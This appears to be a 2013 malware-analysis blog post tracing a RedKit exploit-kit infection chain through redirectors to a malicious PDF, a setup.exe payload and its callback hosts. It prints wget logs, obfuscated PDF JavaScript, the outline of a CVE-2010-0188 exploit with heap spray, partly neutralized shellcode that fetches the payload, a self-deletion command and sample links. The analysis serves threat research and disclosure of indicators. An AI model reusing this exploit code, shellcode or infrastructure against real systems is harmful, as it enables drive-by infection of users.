supportservice060.ru/flow2.php(Thank's to @MalwareSigs tips) that's how the adventure began, and went to the landing page below:
*) As reference here's our previous Red Kit analysis-->>[HERE]
OK. Here's the story:
First of all the route of this case's infection scheme is as follows:#MalwareMustDieInfector Page (flow2.php) 91.243.115.140 supportservice078.ru Infector "Ticket" confirmator (/vd/5;b068d006acd6b9e6e371e501d35be2a7) 46.166.169.238 gzqxj.portrelay.com TDS Redirector page (/tds/in.cgi?9 ) 91.243.115.140 supportservice078.ru RedKit Redirector & Landing pages (hiqy.html) 81.169.145.163 schloss-beratung.de // 302 to other landing page 74.53.109.128 windermerecottage.co.uk // the landing page + payload *) PS: Better watch IPs, domains & DNS used by these↑ infector scheme!It is not like the blackhole, Red Kit use a good confirmation scheme and - a TDS redirector for each access arrived. Infector page, ticket confirmator - and TDS are a set of barricade. Behind those, the Red Kit hosts looks can be - setup to forward infection one to another host by round-robin scheme via - HTTP flag 302. Let's see the following log detail carefully as PoC. We access the infector url:--02:24:22-- h00p://supportservice060.ru/flow2.php Resolving supportservice060.ru... seconds 0.00, 91.243.115.140 Caching supportservice060.ru => 91.243.115.140 Connecting to supportservice060.ru|91.243.115.140|:80... seconds 0.00, connected. : GET /flow2.php HTTP/1.0 Accept: */* Host: supportservice060.ru Connection: Keep-Alive : HTTP request sent, awaiting response... : HTTP/1.1 200 OK Date: Fri, 11 Jan 2013 13:27:04 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 91 Connection: close Content-Type: text/html; charset=UTF-8 : 200 OK Length: 91 [text/html] 02:24:25 (1.55 MB/s) - `flow2.php' saved [91/91]The inside contains:<iframe src="h00p://supportservice078.ru/tds/in.cgi?default" height="3" width="3">So we fetched it further, turns out to be a long way to go.. before get he downloads..--02:27:23-- h00p://supportservice078.ru/tds/in.cgi?default Resolving supportservice078.ru... seconds 0.00, 91.243.115.140 Caching supportservice078.ru => 91.243.115.140 Connecting to supportservice078.ru|91.243.115.140|:80... seconds 0.00, connected. : GET /tds/in.cgi?default HTTP/1.0 Referer: h00p://supportservice060.ru/flow2.php Host: supportservice078.ru Connection: Keep-Alive HTTP request sent, awaiting response... : HTTP/1.1 302 Found Date: Fri, 11 Jan 2013 13:30:02 GMT Server: Apache/2.2.15 (CentOS) Location: h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7 : 302 Found Location: h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7 [following] --02:27:24-- h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7 => `5' Resolving gzqxj.portrelay.com... seconds 0.00, 46.166.169.238 Caching gzqxj.portrelay.com => 46.166.169.238 Connecting to gzqxj.portrelay.com|46.166.169.238|:80... seconds 0.00, connected. : GET /vd/5;b068d006acd6b9e6e371e501d35be2a7 HTTP/1.0 Referer: h00p://supportservice060.ru/flow2.php User-Agent: MalwareMustDie is Sleepy Accept: */* Host: gzqxj.portrelay.com Connection: Keep-Alive HTTP request sent, awaiting response... : HTTP/1.1 302 Found Server: nginx Date: Fri, 11 Jan 2013 19:29:36 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.3.20 Location: h00p://supportservice078.ru/tds/in.cgi?9 Vary: Accept-Encoding,User-Agent : 302 Found Location: h00p://supportservice078.ru/tds/in.cgi?9 [following] Skipping 0 bytes of body: [] done. --02:27:25-- h00p://supportservice078.ru/tds/in.cgi?9 => `in.cgi@9' conaddr is: 46.166.169.238 Found supportservice078.ru in host_name_addresses_map (003D52C8) Connecting to supportservice078.ru|91.243.115.140|:80... seconds 0.00, connected. : GET /tds/in.cgi?9 HTTP/1.0 Referer: h00p://supportservice060.ru/flow2.php User-Agent: MalwareMustDie is Sleepy Accept: */* Host: supportservice078.ru Connection: Keep-Alive Cookie: TSUSER=vdelecc; vbpnx10=_1_; vbpnxdefault=_10_; vbpnxvdelecc=_1_ : HTTP request sent, awaiting response... : HTTP/1.1 302 Found Date: Fri, 11 Jan 2013 13:30:03 GMT Server: Apache/2.2.15 (CentOS) Location: h00p://schloss-beratung.de/hiqy.html : 302 Found Location: h00p://schloss-beratung.de/hiqy.html [following] : --02:27:25-- h00p://schloss-beratung.de/hiqy.html => `hiqy.html' conaddr is: 46.166.169.238 Resolving schloss-beratung.de... seconds 0.00, 81.169.145.163 Caching schloss-beratung.de => 81.169.145.163 Found schloss-beratung.de in host_name_addresses_map (003D6640) Connecting to schloss-beratung.de|81.169.145.163|:80... seconds 0.00, connected. : GET /hiqy.html HTTP/1.0 Referer: h00p://supportservice060.ru/flow2.php User-Agent: MalwareMustDie is Sleepy Accept: */* Host: schloss-beratung.de Connection: Keep-Alive : HTTP request sent, awaiting response... : HTTP/1.1 302 Moved Temporarily Date: Fri, 11 Jan 2013 17:27:18 GMT Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8r X-Powered-By: PHP/5.2.17 Set-Cookie: d3e4aec0be51dc536dfa324cc2df3903=1927452e1f33f00606657af59fa38408; expires=Fri, 18-Jan-2013 17:27:18 GMT; path=/ Location: h00p://windermerecottage.co.uk/hiqy.htm Connection: close Content-Type: text/html : 302 Moved Temporarily Location: h00p://windermerecottage.co.uk/hiqy.htm [following] --02:27:26-- h00p://windermerecottage.co.uk/hiqy.htm => `hiqy.htm' conaddr is: 46.166.169.238 Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128 Caching windermerecottage.co.uk => 74.53.109.128 Found windermerecottage.co.uk in host_name_addresses_map (003D6B10) Connecting to windermerecottage.co.uk|74.53.109.128|:80... seconds 0.00, connected. : GET /hiqy.htm HTTP/1.0 Referer: h00p://supportservice060.ru/flow2.php User-Agent: MalwareMustDie is Sleepy Accept: */* Host: windermerecottage.co.uk Connection: Keep-Alive : HTTP request sent, awaiting response... : HTTP/1.1 200 OK Date: Fri, 11 Jan 2013 17:27:18 GMT Server: Apache Content-Length: 13283 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive Content-Type: text/html : 200 OK Length: 13,283 (13K) [text/html] 02:27:27 (2.93 MB/s) - `hiqy.htm' saved [13283/13283]This hiqy.htm is a landing page script, with 2 jars + 1 pdf infector. To get into hiqy.htm, we must 1st get through the gate at↓supportservice078.ru/tds/in.cgi?9↑which its script & our used access parameter will be the keys to which infector - we will be forwarded. The landing page source: You'll see neutralized landing page code here -->>[PASTEBIN] For analysis I breakdown the code in here -->>[PASTEBIN] The landing page has the jars download urls below:windermerecottage.co.uk/332.jar windermerecottage.co.uk/887.jarbut I can't grab them, bumped with 404. Log:GET /332.jar HTTP/1.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Host: windermerecottage.co.uk Connection: Keep-Alive Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 HTTP request sent, awaiting response... HTTP/1.1 404 Not Found Date: Fri, 11 Jan 2013 17:45:57 GMTThere's a RedKit reference ->>[HERE] explained the way to fetch jars - by the direct link to the 33.html and 41.html via jars to download, but this - wasn't work well & returning a zero byte file, I guess the params are unmatched, PoC:Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128 Caching windermerecottage.co.uk => 74.53.109.128 Connecting to windermerecottage.co.uk|74.53.109.128|:80... seconds 0.00, connected. GET /62.html HTTP/1.0 Referer: h00p://windermerecottage.co.uk/hiqy.htm User-Agent: MalwareMustDie Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai n;q=0.8,image/png,*/*;q=0.5 Host: windermerecottage.co.uk Connection: Keep-Alive Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 HTTP request sent, awaiting response... : HTTP/1.1 200 OK Date: Sat, 12 Jan 2013 08:34:35 GMT Server: Apache Content-Length: 0 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive Content-Type: text/html 200 OK Length: 0 [text/html] 17:34:44 (0.00 B/s) - `62.html' saved [0/0]BUT! There's also a PDF url which I just downloaded it right away :-)--02:47:09-- h00p://windermerecottage.co.uk/987.pdf Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128 Caching windermerecottage.co.uk => 74.53.109.128 Connecting to windermerecottage.co.uk|74.53.109.128|:80... seconds 0.00, connected. GET /987.pdf HTTP/1.0 Referer: h00p://windermerecottage.co.uk/hiqy.htm User-Agent: MalwareMustDie is Sleepy Host: windermerecottage.co.uk Connection: Keep-Alive Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 HTTP request sent, awaiting response... HTTP/1.1 200 OK Date: Fri, 11 Jan 2013 17:47:01 GMT Server: Apache Content-Disposition: inline; filename=5c6bcd22.pdf Content-Length: 6418 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive Content-Type: application/pdf 200 OK Length: 6,418 (6.3K) [application/pdf] 02:47:10 (126.64 MB/s) - `987.pdf' saved [6418/6418]There is a Javascript like below at in the PDF at 0xB1D-0x185C:drols1 = event; gerpsoi= "/*dbgbgfgd dswd*/CHoedsp0DCHoedsp0ACHoedsp76CHoe edsp3BCHoedsp0DCHoedsp0ACHoedsp76CHoedsp61CHoedsp72CHoedsp2 20CHoedsp5FCHoedsp6BCHoedsp5FCHoedsp6DCHoedsp28CHoedsp29CHo oedsp71CHoedsp56CHoedsp29CHoedsp0DCHoedsp0ACHoedsp7BCHoedsp p71CHoedsp56CHoedsp29CHoedsp3BCHoedsp0DCHoedsp0ACHoedsp72CH Hoedsp7BCHoedsp0DCHoedsp0ACHoedsp76CHoedsp61CHoedsp72CHoeds sp3BCHoedsp0DCHoedsp0ACHoedsp76CHoedsp65CHoedsp72CHoedsp20C CHoedsp6ECHoedsp67CHoedsp74CHoedsp68CHoedsp20CHoedsp3CCHoed dsp28CHoedsp76CHoedsp65CHoedsp72CHoedsp2CCHoedsp20CHoedsp31 2CHoedsp6CCHoedsp6FCHoedsp63CHoedsp6BCHoedsp28CHoedsp78CHoe edsp20CHoedsp32CHoedsp20CHoedsp3CCHoedsp20CHoedsp6CCHoedsp6 : : ..Hoedsp7DCHoedsp0DCHoedsp0A"; drols=drols1.target.creator; function tplax(search, replace, subject) { return subject.split(search).join(replace);} function botoe(frodola,fiiio) { valueOf[cmfi](frodola); valueOf[cmfi](Midias);} var dsprpa = "i%ppd"; var cmfi = "e"+ drols1.target.author.toLowerCase().split("").reverse().join(""); ery= tplax("Anila/VCa;",'',drols); botoe(ery,12); var xchdfjh;The PDF Evil JavaScript Source. Here's the evil code (neutralized) -->>[PASTEBIN] I use this code to get payload by simply simulate it ->>[PASTEBIN] There's an exploit CVE-2010-0188 in the decoded code, for the shellcode - execution, with the below structure:splaui(); function splaui(){ var ver = get_ver(); if (ver >= 0x1f40){ // Exploit CVE-2010-0188 var tiff = 'SUkqADggAABB'; // LibTiff Integer aimed for overflow var nops = make_str('QUFB', 0x2ae8); var start = ' QQï½AAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAA EAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////'; var foot = ''; var sc_hex = ''; if (ver < 0x2009){ // determining Adobe version before exloit.. foot = 'o+uASjgggï½puL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK'; var sc_hex = ''4c206..000'; //Shellcode } else { foot = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK'; sc_hex = '4c206..000';} //Shellcode if (foot.length){ var ret = [tiff, nops, start, foot].join(''); var sc_str = hex2str(sc_hex); var scode = str2uni(sc_str); heap_spray3(scode); rVBGo.rawValue = ret; }}}And the shellcode is the below neutralized code:4c 2O 6O Of O5 17 8O 4a 3c 2O 6O Of Of 63 8O 4a L.`....J<.`..c.J a3 eb 8O 4a 3O 2O 82 4a 6e 2f 8O 4a 41 41 41 41 ...JO..Jn/.JAAAA 26 OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO &............... 12 39 8O 4a 64 2O 6O Of OO O4 OO OO 41 41 41 41 .9.Jd.`.....AAAA 41 41 41 41 66 83 e4 fc fc 85 e4 75 34 e9 5f 33 AAAAf......u4._3 cO 64 8b 4O 3O 8b 4O Oc 8b 7O 1c 56 8b 76 O8 33 .d.@O.@..p.V.v.3 db 66 8b 5e 3c O3 74 33 2c 81 ee 15 1O ff ff b8 .f.^<.t3,....... 8b 4O 3O c3 46 39 O6 75 fb 87 34 24 85 e4 75 51 .@O.F9.u..4$..uQ e9 eb 4c 51 56 8b 75 3c 8b 74 35 78 O3 f5 56 8b ..LQV.u<.t5x..V. 76 2O O3 f5 33 c9 49 41 fc ad O3 c5 33 db Of be v...3.IA....3... < C U T > 44 24 O8 2O 2d 73 2O 53 68 f8 OO OO OO ff 56 Oc D$..-s.Sh.....V. 8b e8 33 c9 51 c7 44 1d OO 77 7O 62 74 c7 44 1d ..3.Q.D..wpbt.D. O5 2e 64 6c 6c c6 44 1d O9 OO 59 8a c1 O4 3O 88 ..dll.D...Y...O. 44 1d O4 41 51 6a OO 6a OO 53 57 6a OO ff 56 14 D..AQj.j.SWj..V. 85 cO 75 16 6a OO 53 ff 56 O4 6a OO 83 eb Oc 53 ..u.j.S.V.j....S ff 56 O4 83 c3 Oc eb O2 eb 13 47 8O 3f OO 75 fa .V........G.?.u. 47 8O 3f OO 75 c4 6a OO 6a fe ff 56 O8 e8 9c fe G.?.u.j.j..V.... ff ff 8e 4e Oe ec 98 fe 8a Oe 89 6f O1 bd 33 ca ...N.......o..3. 8a 5b 1b c6 46 79 36 1a 2f 7O 68 74 74 7O 3a 2f .[..Fy6./phttp:/ 2f 77 69 6e 64 65 72 6d 65 72 65 63 6f 74 74 61 /windermerecotta 67 65 2e 63 6f 2e 75 6b 2f 36 32 2e 68 74 6d 6c ge.co.uk/62.html OO OO ..And you cen see the un-obfuscated url for the payload in the end of the shellcode:h00p://windermerecottage.co.uk/62.htmlIf you fetch it you'll get the binary malware setup.exe:GET /62.html HTTP/1.0 Host: windermerecottage.co.uk Connection: Keep-Alive HTTP request sent, awaiting response... HTTP/1.1 200 OK Date: Fri, 11 Jan 2013 17:58:41 GMT Server: Apache Expires: Mon, 20 Aug 2002 02:00:00 GMT Pragma: no-cache Cache-Control: no-cache Content-Transfer-Encoding: binary Content-Disposition: inline; filename=setup.exe <==== Content-Length: 42496 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive Content-Type: application/octet-stream 200 OK Length: 42,496 (42K) [application/octet-stream] 02:58:51 (128.68 KB/s) - `62.html' saved [42496/42496]Looks like this:Sections: .code 0x1000 0x21f0 8704 .text 0x4000 0x41b4 16896 .rdata 0x9000 0x13c 512 .data 0xa000 0xd04 2560 .rsrc 0xb000 0x319c 12800 Compilation timedatestamp.....: 2013-01-11 15:44:17 Target machine................: 0x14C (Intel 386 or later processors and compatible processors) Entry point address...........: 0x00001000 packer: PureBasic 4.x -> Neil Hodgson - additionalPureBasic 4.x -> Neil Hodgson 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ.............. 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................ 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$....... 0080 50 45 00 00 4C 01 05 00 51 33 F0 50 00 00 00 00 PE..L...Q3.P.... 0090 00 00 00 00 E0 00 0F 01 0B 01 02 32 00 64 00 00 ...........2.d.. 00A0 00 42 00 00 00 00 00 00 00 10 00 00 00 10 00 00 .B.............. 00B0 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 ......@......... : : :After de-pack the binary, I found the below CMD command:cmd.exe /c ping -n 1 -w 2000 192.168.123.254 > nul & del %s↑for the self-deletion purpose. And the complete strings are here -->>[PASTEBIN] If we execute this malware, we'll see setup.exe injected itself to a process:And it started making a DNS calls to the hosts below:
cash.taxi-soyuz.ru IN A + orderindiantoronto.com IN A + craportuense.com IN A + stevenyang.ca IN A + goediving.com IN A + triathlonclub.sakura.ne.jp IN A + ouedknouz.com IN A + basement-gallery.com IN A + boersenkeller-frankfurt.de IN A + ex9.com.br IN A +You can see the snapshot process' network activity:With more detail PoC in Wireshark:
And starts making the HTTP/GET requests to below urls:
h00p://basement-gallery.com/h.htm h00p://craportuense.com/i.htm h00p://ouedknouz.com/c.htm h00p://stevenyang.ca/p.htm h00p://orderindiantoronto.com/k.htm h00p://goediving.com/g.htm h00p://ex9.com.br/t.htm h00p://boersenkeller-frankfurt.de/w.htm h00p://cash.taxi-soyuz.ru/l.htm h00p://triathlonclub.sakura.ne.jp/o.htmPoC:Actually these requests was so rapid & fast. In 3minutes it was 16,000+ requests:
Not all the requests succeed reach the mothership, PoC:
--04:07:17-- h00p://triathlonclub.sakura.ne.jp/o.htm Resolving triathlonclub.sakura.ne.jp... 59.106.27.164 Connecting to triathlonclub.sakura.ne.jp|59.106.27.164|:80... connected. HTTP request sent, awaiting response... 404 Not Found 04:07:18 ERROR 404: Not Found. --04:07:57-- h00p://boersenkeller-frankfurt.de/w.htm Resolving boersenkeller-frankfurt.de... 81.28.232.71 Connecting to boersenkeller-frankfurt.de|81.28.232.71|:80... connected. HTTP request sent, awaiting response... 404 Not Found 04:07:59 ERROR 404: Not Found. --04:08:43-- h00p://orderindiantoronto.com/k.htm Resolving orderindiantoronto.com... 174.132.192.130 Connecting to orderindiantoronto.com|174.132.192.130|:80... connected. HTTP request sent, awaiting response... 500 Internal Server Error 04:08:44 ERROR 500: Internal Server Error. --04:09:17-- h00p://ex9.com.br/t.htm Resolving ex9.com.br... 200.98.246.160 Connecting to ex9.com.br|200.98.246.160|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 0 [text/html] 04:09:19 (0.00 B/s) - `t.htm' saved [0/0] --04:09:44-- h00p://stevenyang.ca/p.htm Resolving stevenyang.ca... 216.187.92.109 Connecting to stevenyang.ca|216.187.92.109|:80... connected. HTTP request sent, awaiting response... 404 Not Found 04:09:45 ERROR 404: Not Found. --04:10:11-- h00p://cash.taxi-soyuz.ru/l.htm Resolving cash.taxi-soyuz.ru... 217.16.21.192 Connecting to cash.taxi-soyuz.ru|217.16.21.192|:80... connected. HTTP request sent, awaiting response... 404 Not Found 04:10:12 ERROR 404: Not Found. --04:11:05-- h00p://ouedknouz.com/c.htm Resolving ouedknouz.com... 213.186.33.3 Connecting to ouedknouz.com|213.186.33.3|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 0 [text/html] 04:11:06 (0.00 B/s) - `c.htm' saved [0/0] --04:11:30-- h00p://goediving.com/g.htm Resolving goediving.com... 72.167.232.31 Connecting to goediving.com|72.167.232.31|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 0 [text/html] 04:11:31 (0.00 B/s) - `g.htm' saved [0/0] --04:12:23-- h00p://craportuense.com/i.htm Resolving craportuense.com... 94.127.190.21 Connecting to craportuense.com|94.127.190.21|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 0 [text/html] 04:12:25 (0.00 B/s) - `i.htm' saved [0/0] --04:12:49-- h00p://cash.taxi-soyuz.ru/l.htm Resolving cash.taxi-soyuz.ru... 217.16.21.192 Connecting to cash.taxi-soyuz.ru|217.16.21.192|:80... connected. HTTP request sent, awaiting response... 404 Not Found 04:12:49 ERROR 404: Not Found.↑these domains served the htm file are- actually a compromised servers & implemented with the RedKit responder. Additionally, all of requests are using fake user agent below:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)↑This is important for compromised servers above to check access logs. BTW, one of the callback host has exceeded its HTTP traffic quota ;-))We can't see significant registry changed or other dropped file except - the operations mentioned above. And furthermore, the malware process will suddenly stop/exit without errors. The previous case [HERE] also shows the same payload at the first infection. So, it is a nature of RedKit pack to download for more malwares by first payload. But this time all callback hosts looks unavailable to serve :-) I still wonder WHAT IF the callbacks are successfully returning response.. Virus Total checks currently shows only 5 AntiVirus can initially detect this first payload as malware:
SHA1: 7672f68845b3e43be76eb21559ae0f8e02407e6f MD5: 92899c20da4d9db5627af89998aadc58 File size: 41.5 KB ( 42496 bytes ) File name: setup.exe File type: Win32 EXE Tags: peexe Detection ratio: 5 / 46 Analysis date: 2013-01-11 19:15:32 UTC ( 2 hours, 48 minutes ago ) URL --->>[VirusTotal] Malware Names: Fortinet : W32/Zbot.ANM!tr Malwarebytes : Trojan.Bublik ByteHero : Virus.Win32.Heur.c Kaspersky : UDS:DangerousObject.Multi.Generic Ikarus : Trojan-Downloader.Win32.KaraganyHere's the full sample of this infection:Samples can be downloaded here -->>[MEDIAFIRE] PCAP & Regshot data can be downloaded here -->>[MEDIAFIRE] Detection rates is as follows (click the front numbers for link) There are huge recent infection of Red Kit, which can be found below, as per announced by our fellow crusader: (thank's to @Set_Abominae)
Recent Redkit #Exploit-Kit URL and IPs: pastebin.com/7gvT440u #malwaremustdie #malware
— Set Abominae (@Set_Abominae) January 11, 2013*) [NEW] CURRENT UrlQuery Link for RedKit -->>[HERE]@hulk_crusader @malwaremustdie RedKit: 332.jar -> 33.html (java 6). 887.jar -> 41.html (java 7). 987.pdf -> 62.html
— Set Abominae (@Set_Abominae) January 26, 2013
